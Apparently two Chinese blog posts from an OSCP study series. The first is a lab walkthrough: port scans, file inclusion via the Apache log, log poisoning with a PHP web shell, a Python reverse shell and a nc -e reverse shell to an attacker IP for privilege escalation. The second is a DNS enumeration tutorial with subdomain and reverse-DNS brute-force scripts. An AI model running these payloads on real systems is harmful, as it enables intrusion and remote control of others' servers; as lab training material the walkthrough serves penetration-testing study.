1ports=$(sudo nmap -p- --min-rate=10000 -Pn 192.168.149.72 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
2echo $ports
3sudo nmap --script=vuln -p$ports -Pn 192.168.149.72
4sudo nmap -sU --min-rate 10000 -p- -Pn 192.168.149.72

再次细致的扫描端口上的组件和版本信息，这里VPN断了，所以没有扫除具体信息。从之前用官方的My Kali扫描的信息能获得一些端口的信息。

1sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.149.72

从之前的扫描信息中看，除了80端口，还有8593端口也开放，一个一个点开了看看有什么。

文件包含

从8593端口的链接方式猜测似乎有文件包含漏洞

1../../../../../../../../../var/log/apache2/access.log

log文件投毒

可以看到log文件中记录了请求头，我们下一步在请求头中写入一句话木马，就可以把log污染成马。

到这里链接断了，换了重启靶机后IP更换为 192.168.196.72，用Win本机的Burp抓不上包改用命令行注入

1echo -e "GET / HTTP/1.1\r\nHost: 192.168.51.72\r\nUser-Agent: <?php system(\$_GET['cmd']); ?>\r\nConnection: close\r\n\r\n" | nc 192.168.51.72 80
2或者
3nc 192.168.43.127 80
4回车输入GET /<?php system($_GET['cmd']); ?> HTTP/1.1

或者也可以用浏览器工具，但是这个似乎不成功。

反弹Shell

然后把命令换成反弹shell的命令，这个本机的地址

1python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.45.180%22%2C4777%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27

提权

输入以下命令查找有root权限的文件和进程

1ps -aux | grep root

可以发现在/var/tmp/sv/目录下似乎有一些奇特的东西

这是一个php文件，是网页主页的文件，从命令来看，他开在57端口。下一步的思路就是，把这个php改成能提权弹shell的木马。然后访问57端口就能激活这个一句话木马。

1echo "<?php system('nc 192.168.45.180 4445 -e /bin/bash')?>" >> index.php

57这个端口没有对外开放，所以我们只能在shell上弹一下。

1.\nc.exe -lvnp 4445
2curl 127.0.0.1:57/index.php

补充知识点

/usr/sbin/nologin和/bin/bash的区别

特性	/usr/sbin/nologin	/bin/bash
基本用途	禁止交互式登录	允许交互式命令行操作
用户类型	系统服务账户（如 mysql, www-data）	普通用户或管理员账户
登录行为	▶ 拒绝登录 ▶ 显示预设提示信息（默认或自定义）	▶ 允许登录 ▶ 启动 Bash 交互环境
Shell 功能	无执行能力（仅返回错误信息）	完整命令行解释器（支持脚本/命令）
自定义提示	支持（通过 `/etc/nologin.txt` 文件）	通过 `~/.bashrc` 自定义
典型应用场景	守护进程账户 FTP虚拟用户安全锁账户	普通用户登录管理员维护开发环境
检查命令	`grep nologin /etc/passwd`	`grep bash /etc/passwd`

详细说明

/usr/sbin/nologin
- 安全隔离机制：阻止账户获得任何交互式 Shell
- 工作流程：
  1. 用户尝试登录（SSH/FTP/控制台）
  2. 系统显示拒绝信息（默认："This account is currently not available."）
  3. 立即终止会话
- 自定义提示：
```
echo "管理员专用账户，禁止登录" > /etc/nologin.txt
```
- 典型配置示例
  
  （/etc/passwd）：
```
ftpuser:x:1001:1001::/var/ftp:/usr/sbin/nologin
```
/bin/bash
- 全功能交互环境：
  - 支持命令执行、脚本运行、作业控制
  - 配置文件：~/.bashrc, ~/.profile
- 开发/运维能力：
```
# 允许运行所有命令
$ vim /etc/config
$ systemctl restart service
```

⚠️ 重要安全建议

系统服务账户 必须使用 nologin（如 MySQL/Nginx 账户）
普通用户 仅在必要时应获得 bash 权限
临时锁定账户：usermod -s /usr/sbin/nologin username
解锁账户：usermod -s /bin/bash username

Day18 Kali主动信息收集DNS

Sun, 06 Jul 2025 23:45:46 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

DNS枚举

DNS枚举在主动信息收集（尤其是渗透测试或红队行动初期）中扮演着核心角色，它的核心价值在于揭示目标组织面向互联网的域名基础设施和相关系统的细节，从而勾勒出初步的攻击面。

发现子域名：
- 这是最重要的目的之一。主域名（如example.com）可能只暴露少量服务，但大量内部开发、测试、特定部门或业务线使用的系统往往部署在子域名下（如admin.example.com, dev.example.com, vpn.example.com, api.example.com）。
- 枚举这些子域名能显著扩大已知的攻击面，揭示隐藏的、可能安全性较弱的入口点。
识别关联的主机和服务：
- 通过查询A记录和AAAA记录，DNS枚举能将域名和子域名映射到具体的IPv4和IPv6地址。这直接揭示了目标实际运行网络服务的计算机位置（主机）。
- 知道主机IP是后续扫描（端口扫描、服务识别）和潜在攻击的起点。
发现电子邮件服务器：
- 通过查询MX记录，可以确定目标组织用于接收电子邮件的邮件服务器及其优先级。这是针对邮件系统进行渗透测试或发起鱼叉式钓鱼攻击的重要信息。
定位关键网络基础设施：
- 名称服务器记录：通过查询NS记录，确定该域名由哪些权威DNS服务器负责解析。攻击这些服务器或其配置弱点可能导致DNS劫持或拒绝服务。
- 邮件服务器信息：MX记录（如上所述）。
- 反向代理/CDN后端源站：有时CNAME记录可能指向CDN提供商的域名（如assets.example.com CNAME assets.customer-cdn.net），但也可能指向内部的负载均衡器或实际的应用服务器。
查找别名和重定向：
- CNAME记录将一个域名或子域名别名到另一个规范的域名。这有助于理解：
  - 基础设施架构（例如，某个子域名实际指向另一个服务器上的服务）。
  - 是否使用了第三方服务（例如，CNAME到AWS S3桶或第三方CMS）。
  - 可能指向内部系统（如果配置错误或暴露）。
探测安全配置信息：
- TXT记录：
  - SPF记录：用于防止邮件欺骗，包含允许发送该域名邮件的服务器IP地址或主机名列表。这可以直接泄露邮件服务器的IP范围。
  - DKIM记录：提供邮件签名公钥，用于验证邮件完整性。
  - DMARC记录：指定如何处理不符合SPF/DKIM的邮件的策略。
  - 意外信息：有时管理员会在TXT记录中留下注释、内部服务器名称、验证码（用于验证域名所有权，可能被滥用）甚至凭据（严重错误）。
- 暴露的服务器类型/版本：有时SRV记录（指向特定服务的位置，如_ldap._tcp.example.com）或CNAME可以暗示底层运行的服务器类型（如Windows域控制器）。
收集组织的网络边界信息：
- 通过获取所有与目标主域名及其子域名相关的A、AAAA记录，实际上是在映射目标组织在公网上拥有和控制的IP地址块。这对于理解他们的整体网络规模、可能的AS编号以及后续的网络层扫描（如端口扫描整个IP段）至关重要。
构建目标组织的数字资产清单：
- DNS枚举结果是构建目标组织完整互联网资产清单的基础。它列出了所有已知的、面向互联网的域名和对应的主机/IP地址。

为什么DNS枚举如此重要？

非侵入性（相对而言）： 标准的DNS查询（非区域传输）通常被认为是良性的、合法的互联网流量，难以被检测为恶意行为。它是一个相对隐蔽的起点。
信息价值高： 收集到的信息对于规划后续攻击步骤（下一步扫描哪个IP/端口，攻击哪个子域，如何伪造邮件）具有极高的指导价值。
易被忽略的安全点： 许多组织在子域名、废弃域名或DNS记录配置上存在疏忽（如暴露内部服务器名或IP），DNS枚举是发现这些弱点的有效方法。
攻击面扩展的核心： 未发现的子域名或IP地址意味着未评估的安全风险。DNS枚举确保在深入了解具体漏洞前，尽可能全面地掌握目标暴露在外的入口点。

DNS记录类型详解

ns - 包含载域DNS记录得授权服务器的名称
A- 包含主机名的IP地址
MX - 包含负责处理该域电子邮件的服务器名称，可以有多个MX记录
PTR 别名记录（反向区域使用）
CNAME - 别名记录，指向其他主机记录
TXT - 文本记录，可包含任意数据，常用于域所有权验证

NS (Name Server) 记录：
- 含义： 这是最基础、最关键的记录之一。它指定了哪些 DNS 服务器是某个特定域（比如 example.com）的权威服务器。权威服务器存储着该域所有 DNS 记录的官方、最终版本。
- 作用： 当你的电脑或其他解析器需要查询 example.com 或其子域（如 www.example.com）的信息时，它首先会查找根 DNS 服务器，然后根据 .com 的顶级域服务器指引，最终找到 example.com 的 NS 记录指向的服务器。这些服务器才能提供 example.com 域下所有记录的准确答案（如 A、MX、CNAME 等）。
- 重要性： 没有正确的 NS 记录，整个域的 DNS 解析就无法正常工作。攻击者常通过 NS 记录来定位目标组织的权威 DNS 服务器，这些服务器本身也可能是攻击目标。
- 示例： example.com. IN NS ns1.provider.com. example.com. IN NS ns2.provider.com.
A (Address) 记录：
- 含义： 这是最常用的记录类型。它将一个主机名（域名或子域名）直接映射到一个 IPv4 地址。
- 作用： 当你在浏览器输入 www.example.com 时，DNS 系统最终会查找该主机名的 A 记录，获得其对应的 IP 地址（如 93.184.216.34），然后你的浏览器才能连接到该 IP 地址的服务器获取网页内容。它负责将“人类可读”的名字转换成机器使用的 IP 地址。
- 示例： www.example.com. IN A 93.184.216.34
AAAA (Quad-A) 记录：
- 含义： 功能与 A 记录完全相同，但它映射的是 IPv6 地址。
- 作用： 随着 IPv4 地址耗尽，IPv6 越来越重要。AAAA 记录让主机名能够解析到 IPv6 地址。
- 示例： www.example.com. IN AAAA 2606:2800:220:1:248:1893:25c8:1946
MX (Mail eXchange) 记录：
- 含义： 指定负责接收发送到该域（不是特定主机名）的电子邮件的邮件服务器。
- 特点：
  - 指向的是主机名（通常有对应的 A/AAAA 记录），而不是直接指向 IP 地址。
  - 可以有多个 MX 记录，每个记录有一个优先级值（数字越小，优先级越高）。发送邮件的服务器会先尝试连接优先级最高的邮件服务器，如果失败，再尝试优先级较低的。
- 作用： 确保发送到 user@example.com 的邮件能被正确路由到处理 example.com 邮件的服务器上。
- 示例： example.com. IN MX 10 mailserver1.example.com. example.com. IN MX 20 mailserver2.example.com.
PTR (Pointer) 记录：
- 含义： 用于反向 DNS 查找。它将一个 IP 地址映射回一个主机名。
- 作用：与 A/AAAA 记录相反。主要用于：
  - 日志记录： 在系统日志中显示 IP 地址对应的主机名，更易读。
  - 网络诊断： traceroute, ping 等工具有时会尝试反向解析 IP 地址。
  - 安全验证： 一些邮件服务器会检查发送方 IP 的反向解析记录是否与声称的发件域匹配（作为反垃圾邮件措施的一部分，但效果有限）。
  - 系统管理： 识别网络上的设备。
- 存储位置： PTR 记录存储在特殊的 DNS 域中，通常是 in-addr.arpa (IPv4) 或 ip6.arpa (IPv6)。
- 示例： 34.216.184.93.in-addr.arpa. IN PTR www.example.com. (这是 93.184.216.34 的反向记录)
CNAME (Canonical Name) 记录：
- 含义： 为一个主机名设置一个别名。它指向的是另一个主机名（称为规范名或真实名），而不是直接指向 IP 地址。
- 作用：
  - 简化管理： 例如，你可以让 www.example.com 作为 webserver-prod-lb-01.example.com 的别名。如果真实服务器的 IP 地址变了，你只需要更新 webserver-prod-lb-01.example.com 的 A 记录，所有指向它的 CNAME 会自动生效。
  - 指向外部服务： 例如，files.example.com 的 CNAME 可能指向某个云存储服务商提供的域名（如 example.bucket.s3.amazonaws.com）。
- 重要规则：
  - CNAME 记录不能与其他记录类型（如 MX, TXT, NS）共存于同一个主机名下。例如，example.com 不能同时有 CNAME 记录和 MX 记录。
  - CNAME 应该指向一个有效的、最终会解析到 A 或 AAAA 记录的主机名。
- 示例： www.example.com. IN CNAME webserver-prod-lb-01.example.com.
TXT (Text) 记录：
- 含义： 允许域管理员在 DNS 中存储任意文本信息。
- 用途广泛：
  - SPF (Sender Policy Framework)： 指定哪些邮件服务器被授权代表该域发送邮件（格式如 v=spf1 include:_spf.google.com ~all）。用于反垃圾邮件。
  - DKIM (DomainKeys Identified Mail)： 存储用于验证邮件签名的公钥（格式如 v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC...）。
  - DMARC (Domain-based Message Authentication, Reporting & Conformance)： 定义如何处理未通过 SPF 或 DKIM 检查的邮件，以及发送报告的位置（格式如 v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com）。
  - 域所有权验证： 许多在线服务（如 Google Workspace, SSL 证书颁发机构）会让你在域名的 TXT 记录中添加一段特定文本（如 google-site-verification=abcdefg123456）来证明你拥有该域。
  - 其他信息： 有时会包含联系人信息、策略声明或其他任意备注（但应避免存储敏感信息）。
- 示例： example.com. IN TXT "v=spf1 include:_spf.google.com ~all" _dmarc.example.com. IN TXT "v=DMARC1; p=none; rua=mailto:dmarc-reports@example.com"

其他重要的 DNS 记录类型：

SOA (Start of Authority) 记录：
- 含义： 每个 DNS 区域文件必须包含且只能包含一个 SOA 记录。它包含关于该 DNS 区域的管理信息。
- 包含内容： 主要名称服务器 (MNAME)、区域负责人的邮箱 (RNAME - 注意格式，如 admin.example.com 实际是 admin.example.com，第一个点通常写作 admin\.example.com)、区域序列号 (SERIAL - 每次修改区域文件需递增此号)、刷新间隔 (REFRESH)、重试间隔 (RETRY)、过期时间 (EXPIRE)、负缓存 TTL (MINIMUM)。
- 作用： 用于区域传输（从主服务器同步到从服务器）和缓存管理。序列号是判断区域文件是否更新的关键。
SRV (Service) 记录：
- 含义： 指定提供特定服务（如 LDAP, SIP, XMPP）的服务器的主机名和端口号。
- 格式：
```
_Service._Proto.Name TTL Class SRV Priority Weight Port Target
```
  - _Service：服务名称（如 _ldap, _sip）。
  - _Proto：协议（通常是 _tcp 或 _udp）。
  - Name：该记录所适用的域名。
  - Priority：类似 MX 记录的优先级。
  - Weight：在相同优先级下用于负载均衡的权重。
  - Port：服务运行的端口号。
  - Target：提供该服务的主机名（需有 A/AAAA 记录）。
- 作用： 使客户端能够自动发现特定服务的服务器位置（哪个主机、哪个端口）。
- 示例： _sip._tcp.example.com. IN SRV 10 60 5060 sipserver.example.com.

在 Kali Linux 中查询 DNS 记录的工具

Kali Linux 自带了许多强大的网络工具，查询 DNS 记录主要使用 dig 和 nslookup，有时也会用到 host。

dig (Domain Information Groper)：
- 最强大、最灵活、最推荐的工具。 提供详细输出，非常适合调试和理解 DNS 响应。
- 基本语法：
```
dig [@server] [domain] [record_type]
```
  - @server：可选，指定查询哪个 DNS 服务器（如 @8.8.8.8）。不指定则使用系统默认 DNS。
  - domain：要查询的域名或主机名。
  - record_type：要查询的记录类型（如 A, AAAA, MX, NS, TXT, CNAME, SOA, PTR, SRV）。不指定默认为 A。
- 常用选项：
  - +short：只显示最精简的结果（通常就是记录值）。
  - +noall +answer：只显示查询的答案部分（最常用）。
- 查询示例：
  - 查询 example.com 的 A 记录：dig example.com A 或 dig +short example.com A
  - 查询 example.com 的 MX 记录：dig example.com MX +noall +answer
  - 查询 example.com 的 NS 记录：dig example.com NS
  - 查询 example.com 的 TXT 记录（常用于看 SPF/DKIM/DMARC）：dig example.com TXT
  - 查询 www.example.com 的 CNAME 记录：dig www.example.com CNAME
  - 查询 example.com 的 SOA 记录：dig example.com SOA
  - 查询 PTR 记录（反向解析 93.184.216.34）：dig -x 93.184.216.34
  - 查询 SRV 记录（如 SIP TCP 服务）：dig _sip._tcp.example.com SRV
nslookup：
- 交互式命令行工具， 也支持非交互模式。功能不如 dig 强大，但更简单直观。
- 基本语法（非交互）：
```
nslookup [-type=record_type] [domain] [server]
```
  - -type=record_type：指定记录类型（如 a, aaaa, mx, ns, txt, cname, soa, ptr）。
  - domain：要查询的域名或主机名。
  - server：可选，指定查询哪个 DNS 服务器。
- 交互模式：直接输入
```
nslookup
```
  ，然后按提示输入命令：
  - server 8.8.8.8：设置默认查询服务器。
  - set type=mx：设置查询的记录类型。
  - example.com：执行查询。
  - exit：退出。
- 查询示例：
  - 查询 example.com 的 A 记录：nslookup example.com
  - 查询 example.com 的 MX 记录：nslookup -type=mx example.com
  - 查询 example.com 的 TXT 记录：nslookup -type=txt example.com
  - 查询 PTR 记录：nslookup 93.184.216.34

host：

简单易用的工具， 输出比 dig +short 稍详细一点，但不如 dig 完整。

基本语法：

host [-t record_type] [domain] [server]
└─$ host -v
Usage: host [-aCdilrTvVw] [-c class] [-N ndots] [-t type] [-W time]
 [-R number] [-m flag] [-p port] hostname [server]
 -a is equivalent to -v -t ANY
 -A is like -a but omits RRSIG, NSEC, NSEC3
 -c specifies query class for non-IN data
 -C compares SOA records on authoritative nameservers
 -d is equivalent to -v
 -l lists all hosts in a domain, using AXFR
 -m set memory debugging flag (trace|record|usage)
 -N changes the number of dots allowed before root lookup is done
 -p specifies the port on the server to query
 -r disables recursive processing
 -R specifies number of retries for UDP packets
 -s a SERVFAIL response should stop query
 -t specifies the query type
 -T enables TCP/IP mode
 -U enables UDP mode
 -v enables verbose output
 -V print version number and exit
 -w specifies to wait forever for a reply
 -W specifies how long to wait for a reply
 -4 use IPv4 query transport only
 -6 use IPv6 query transport only
用法：host [-aCdilrTvVw][-c 类别][-N 点数][-t 类型][-W 时间]
[-R 次数][-m 标志][-p 端口]主机名 [服务器]
-a 等同于 -v -t ANY
-A 类似 -a 但不包含 RRSIG、NSEC、NSEC3
-c 指定非 IN 数据的查询类别
-C 比较权威名称服务器上的 SOA 记录
-d 等同于 -v
-l 列出域中的所有主机，使用 AXFR
-m 设置内存调试标志（跟踪记录|使用情况）
N 更改在执行根查找前允许的点数
-p 指定要查询的服务器端口
-r 禁用递归处理
-R 指定 UDP 数据包的重试次数
-s SERVFAIL 响应应停止查询
-t 指定查询类型
-T 启用 TCP/IP 模式
-U 启用 UDP 模式
-v 启用详细输出
-V 打印版本号并退出
-w 指定无限期等待回复
-W 指定等待回复的时间
-4 仅使用 IPv4 查询传输
-6 仅使用 IPv6 查询传输

-t record_type：指定记录类型（如 a, aaaa, mx, ns, txt, cname, soa, ptr）。
domain：要查询的域名或主机名。
server：可选，指定查询哪个 DNS 服务器。

查询示例：
- 查询 example.com 的 A 记录：host example.com
- 查询 example.com 的 MX 记录：host -t mx example.com
- 查询 example.com 的 TXT 记录：host -t txt example.com
- 查询 PTR 记录：host 93.184.216.34

1host www.megacorpone.com 
2host -t mx megacorpone.com
3host -t txt megacorpone.com
4host -t ns megacorpone.com
5host -C megacorpone.com # 比较所有权威DNS服务器的 SOA 序列号

反查IP对应的域名

总结：

dig 是专业首选，信息最全，功能最强。
nslookup 交互模式适合简单探索。
host 适合快速获取简洁结果。

当然，DNS查询也可以通过一些在线网站查询。

正向子域名爆破

写一个列表，用循环来实现爆破

1cat > list.txt
2www
3ftp
4mail
5owa
6proxy
7router
8# 回车后按ctrl D 结束保存
9for ip in $(cat list.txt); do host $ip.megacorpone.com; done

使用AI帮助我们改进一下这个命令就是：

1while IFS= read -r subdomain; do 
2 host "$subdomain.megacorpone.com" 2>&1 | grep -v -e 'not found' -e '^$'
3done < list.txt

如果只想要IP就是

1while IFS= read -r subdomain; do 
2 host -t A "$subdomain.megacorpone.com" 2>/dev/null | awk '/has address/ {print $4}'
3done < list.txt

想要更全的子域名大字典可以用

1sudo apt install seclists

安装后在 /usr/share/seclists目录下找到更多子域名列表来爆破，在Github上也能找到更多更强大的字典来爆破，日常渗透过程中也可以注意收集目标常用的信息来自制字典。

字典越强大，扫的东西越多。

Similar Projects

Assetnote Wordlists: High quality wordlists for content and subdomain discovery which are automatically updated every month.
fuzz.txt: Wordlists of “potentially dangerous” files.
FuzzDB: Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF
BiblePass: Wordlists compiled from Bible verses
SamLists: Data-driven wordlists containing HTTP parameter names, directory names and filenames.

Wordlist Tools

Cook: A wordlist framework. An overpowered wordlist generator, splitter, merger, finder and saver. Cook facilitates the creation of permutations and combinations with a variety of encodings and many more features.
Wl: CLI utility for converting strings to a given casing style.
CeWL: Custom Word List generator.

用AI帮我们把工具加强一下。

 1#!/bin/bash
 2
 3# 脚本名称: subdomainfind.sh
 4# 功能: 子域名枚举工具，支持原始输出、格式化表格和CSV导出
 5# 用法: ./subdomainfind.sh 域名 [-w 字典文件] [-o 输出文件]
 6
 7# 错误处理函数
 8die() {
 9 echo "错误: $1" >&2
 10 echo "用法: $0 域名 [-w 字典文件] [-o 输出文件]"
 11 exit 1
 12}
 13
 14# 检查参数
 15if [ $# -eq 0 ]; then
 16 die "缺少域名参数"
 17fi
 18
 19DOMAIN="$1"
 20DEFAULT_WORDLIST="/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt"
 21WORDLIST=""
 22OUTPUT_FILE=""
 23CSV_OUTPUT=""
 24
 25# 处理参数
 26shift
 27while [ $# -gt 0 ]; do
 28 case "$1" in
 29 -w)
 30 shift
 31 WORDLIST="$1"
 32 if [ -z "$WORDLIST" ]; then
 33 die "-w 需要指定字典文件"
 34 fi
 35 if [ ! -f "$WORDLIST" ]; then
 36 die "字典文件不存在: $WORDLIST"
 37 fi
 38 ;;
 39 -o)
 40 shift
 41 OUTPUT_FILE="$1"
 42 if [ -z "$OUTPUT_FILE" ]; then
 43 die "-o 需要指定输出文件名"
 44 fi
 45 CSV_OUTPUT="${OUTPUT_FILE%.csv}.csv"
 46 ;;
 47 *)
 48 die "未知参数: $1"
 49 ;;
 50 esac
 51 shift
 52done
 53
 54# 设置默认字典
 55if [ -z "$WORDLIST" ]; then
 56 WORDLIST="$DEFAULT_WORDLIST"
 57 if [ ! -f "$DEFAULT_WORDLIST" ]; then
 58 die "默认字典不存在: $DEFAULT_WORDLIST"
 59 fi
 60 echo "使用默认字典: $WORDLIST"
 61fi
 62
 63# 设置默认输出文件
 64if [ -z "$CSV_OUTPUT" ]; then
 65 SAFE_DOMAIN=$(echo "$DOMAIN" | tr -cd '[:alnum:]._-')
 66 CSV_OUTPUT="${SAFE_DOMAIN}.csv"
 67fi
 68
 69# 创建临时文件存储结果
 70RESULT_FILE=$(mktemp)
 71
 72# 获取字典行数
 73TOTAL=$(wc -l < "$WORDLIST" 2>/dev/null || die "无法读取字典文件")
 74
 75# 开始扫描
 76echo "============================="
 77echo "开始子域名枚举扫描"
 78echo "目标域名: $DOMAIN"
 79echo "使用字典: $WORDLIST"
 80echo "扫描数量: $TOTAL"
 81echo "开始时间: $(date)"
 82echo "CSV输出文件: $CSV_OUTPUT"
 83echo "============================="
 84echo
 85
 86START_TIME=$(date +%s)
 87COUNT=0
 88FOUND=0
 89
 90# 初始化CSV文件
 91echo "子域名,IP地址" > "$CSV_OUTPUT"
 92
 93# 主扫描循环
 94while IFS= read -r subdomain; do 
 95 # 进度统计
 96 ((COUNT++))
 97 
 98 # 计算时间和进度
 99 CURRENT_TIME=$(date +%s)
100 ELAPSED_SEC=$((CURRENT_TIME - START_TIME))
101 if [ $COUNT -gt 0 ]; then
102 AVG_TIME_PER_REC=$((ELAPSED_SEC / COUNT))
103 REMAINING=$((TOTAL - COUNT))
104 ESTIMATED_REMAINING_SEC=$((AVG_TIME_PER_REC * REMAINING))
105 MINS_REMAINING=$((ESTIMATED_REMAINING_SEC / 60))
106 SECS_REMAINING=$((ESTIMATED_REMAINING_SEC % 60))
107 fi
108 
109 # 计算进度百分比
110 PERCENT=$((COUNT * 100 / TOTAL))
111 
112 # 创建简洁的当前查询显示 (最多显示前20个字符)
113 current_query="${subdomain}.$DOMAIN"
114 display_query="${current_query:0:20}"
115 if [ ${#current_query} -gt 20 ]; then
116 display_query="${display_query}..."
117 fi
118 
119 # 创建进度条
120 bar=""
121 for ((i=0; i<50; i++)); do
122 if [ $i -lt $((PERCENT / 2)) ]; then
123 bar="${bar}#"
124 else
125 bar="${bar}."
126 fi
127 done
128 
129 # 显示进度信息
130 printf "进度: [%-50s] %3d%% | %d/%d | 时间: %02d:%02d | ETA: %02d:%02d | 当前: %s\r" \
131 "$bar" $PERCENT $COUNT $TOTAL \
132 $((ELAPSED_SEC / 60)) $((ELAPSED_SEC % 60)) \
133 $MINS_REMAINING $SECS_REMAINING \
134 "$display_query"
135 
136 # 执行DNS查询
137 result=$(host -t A "${subdomain}.$DOMAIN" 2>/dev/null)
138 
139 # 处理结果
140 if [[ "$result" == *"has address"* ]]; then
141 ((FOUND++))
142 
143 # 1. 输出原始格式结果
144 echo "$result"
145 
146 # 2. 保存结果用于表格
147 echo "$result" | grep -oE '[^ ]+ has address [0-9.]+' >> "$RESULT_FILE"
148 
149 # 3. 添加到CSV文件
150 echo "$result" | awk '/has address/ {print $1 "," $4}' >> "$CSV_OUTPUT"
151 fi
152 
153done < "$WORDLIST"
154
155# 清除进度行
156printf "\n\n"
157
158# 计算总耗时
159END_TIME=$(date +%s)
160TOTAL_TIME=$((END_TIME - START_TIME))
161
162# 显示表格总结
163if [ -s "$RESULT_FILE" ]; then
164 echo "============================="
165 echo "扫描结果汇总 (活动子域名)"
166 echo "============================="
167 echo
168 
169 # 确保表格对齐（包含标题长度）
170 max_sub_len=9 # "Subdomain" 标题长度
171 max_ip_len=10 # "IP Address" 标题长度
172 
173 # 读取结果计算最大长度
174 while IFS= read -r line; do
175 subdomain=$(echo "$line" | awk '{print $1}')
176 ip=$(echo "$line" | awk '{print $4}')
177 
178 # 处理超长字段
179 subdomain=${subdomain:0:60}
180 ip=${ip:0:15}
181 
182 if [ ${#subdomain} -gt $max_sub_len ]; then
183 max_sub_len=${#subdomain}
184 fi
185 
186 if [ ${#ip} -gt $max_ip_len ]; then
187 max_ip_len=${#ip}
188 fi
189 done < "$RESULT_FILE"
190 
191 # 添加边距
192 max_sub_len=$((max_sub_len + 2))
193 max_ip_len=$((max_ip_len + 2))
194 if [ $max_sub_len -lt 20 ]; then max_sub_len=20; fi
195 if [ $max_ip_len -lt 15 ]; then max_ip_len=15; fi
196 
197 # 创建表格顶部
198 printf "┌─%s─┬─%s─┐\n" "$(printf '%*s' "$max_sub_len" "" | tr ' ' '-')" \
199 "$(printf '%*s' "$max_ip_len" "" | tr ' ' '-')"
200 
201 # 表格标题
202 printf "│ %-${max_sub_len}s │ %-${max_ip_len}s │\n" "Subdomain" "IP Address"
203 printf "├─%s─┼─%s─┤\n" "$(printf '%*s' "$max_sub_len" "" | tr ' ' '-')" \
204 "$(printf '%*s' "$max_ip_len" "" | tr ' ' '-')"
205 
206 # 表格内容
207 while IFS= read -r line; do
208 subdomain=$(echo "$line" | awk '{print $1}')
209 ip=$(echo "$line" | awk '{print $4}')
210 
211 # 截断超长字段
212 subdomain=${subdomain:0:60}
213 ip=${ip:0:15}
214 
215 printf "│ %-${max_sub_len}s │ %-${max_ip_len}s │\n" "$subdomain" "$ip"
216 done < "$RESULT_FILE"
217 
218 # 表格底部
219 printf "└─%s─┴─%s─┘\n" "$(printf '%*s' "$max_sub_len" "" | tr ' ' '-')" \
220 "$(printf '%*s' "$max_ip_len" "" | tr ' ' '-')"
221 echo
222fi
223
224# 保存原始输出
225if [ -s "$RESULT_FILE" ]; then
226 LOG_FILE="${CSV_OUTPUT%.csv}.log"
227 cp "$RESULT_FILE" "$LOG_FILE"
228else
229 LOG_FILE=""
230fi
231
232# 输出统计信息
233echo "============================="
234echo "扫描完成"
235echo "结束时间: $(date)"
236echo "总耗时: $((TOTAL_TIME / 60)) 分钟 $((TOTAL_TIME % 60)) 秒"
237echo "共扫描: $COUNT 个子域名"
238echo "发现: $FOUND 个活动子域名"
239if [ -n "$LOG_FILE" ]; then
240 echo "原始输出: $LOG_FILE"
241fi
242echo "CSV文件: $CSV_OUTPUT"
243echo "============================="
244
245# 清理临时文件
246rm -f "$RESULT_FILE"

反向C段IP爆破

从之前的扫描结果看，这个域名大多数解析到167.114.21.x的C段IP地址，说明这个公司包揽了这个段上的大多数连续的服务器，用来承载业务，那么就有可能存在这个C段中，没有域名，或者说还没来得及挂上域名的测试站点，或者说一个公司某个部门、总部、第三方委托的服务器商之类的角色管理这些服务器，而megacorpone.com这个域名只是他们子公司域名之一，可能还存在其他域名，只要是存在业务关系的，他们的服务器之间一定会存在业务关联，这时候就需要IP反向搜索爆破新域名。

1for Cip in $(seq 50 100); do host 167.114.21.$Cip; done | grep -v "not fou
2nd"
3for Cip in $(seq 0 254); do host 167.114.21.$Cip; done | grep -v "not fou
4nd"

同样的，我们用AI写一个小工具

 1#!/bin/bash
 2
 3# 脚本名称: reverse_dns_scan.sh
 4# 功能: 反向DNS扫描工具，支持进度显示、格式化表格和CSV导出
 5# 用法: ./reverse_dns_scan.sh 网络地址 起始IP 结束IP
 6
 7# 错误处理函数
 8die() {
 9 echo "错误: $1" >&2
 10 echo "用法: $0 网络地址 起始IP 结束IP"
 11 exit 1
 12}
 13
 14# 检查参数
 15if [ $# -ne 3 ]; then
 16 die "需要三个参数：网络地址、起始IP和结束IP"
 17fi
 18
 19NETWORK="$1"
 20START_IP="$2"
 21END_IP="$3"
 22
 23# 验证IP范围
 24if ! [[ "$START_IP" =~ ^[0-9]+$ ]] || ! [[ "$END_IP" =~ ^[0-9]+$ ]]; then
 25 die "起始IP和结束IP必须是数字"
 26fi
 27
 28if [ "$START_IP" -gt "$END_IP" ]; then
 29 die "起始IP不能大于结束IP"
 30fi
 31
 32# 设置输出文件
 33SAFE_NETWORK=$(echo "$NETWORK" | tr -cd '[:alnum:]._-')
 34CSV_OUTPUT="${SAFE_NETWORK}_${START_IP}-${END_IP}_reverse_dns.csv"
 35
 36# 创建临时文件存储结果
 37RESULT_FILE=$(mktemp)
 38
 39# 计算总数
 40TOTAL=$((END_IP - START_IP + 1))
 41
 42# 开始扫描
 43echo "============================="
 44echo "开始反向DNS扫描"
 45echo "网络地址: $NETWORK"
 46echo "IP范围: $START_IP - $END_IP"
 47echo "扫描数量: $TOTAL"
 48echo "开始时间: $(date)"
 49echo "CSV输出文件: $CSV_OUTPUT"
 50echo "============================="
 51echo
 52
 53START_TIME=$(date +%s)
 54COUNT=0
 55FOUND=0
 56
 57# 初始化CSV文件
 58echo "IP地址,域名" > "$CSV_OUTPUT"
 59
 60# 主扫描循环
 61for CIP in $(seq "$START_IP" "$END_IP"); do
 62 IP="${NETWORK}.${CIP}"
 63 
 64 # 进度统计
 65 ((COUNT++))
 66 
 67 # 计算时间和进度
 68 CURRENT_TIME=$(date +%s)
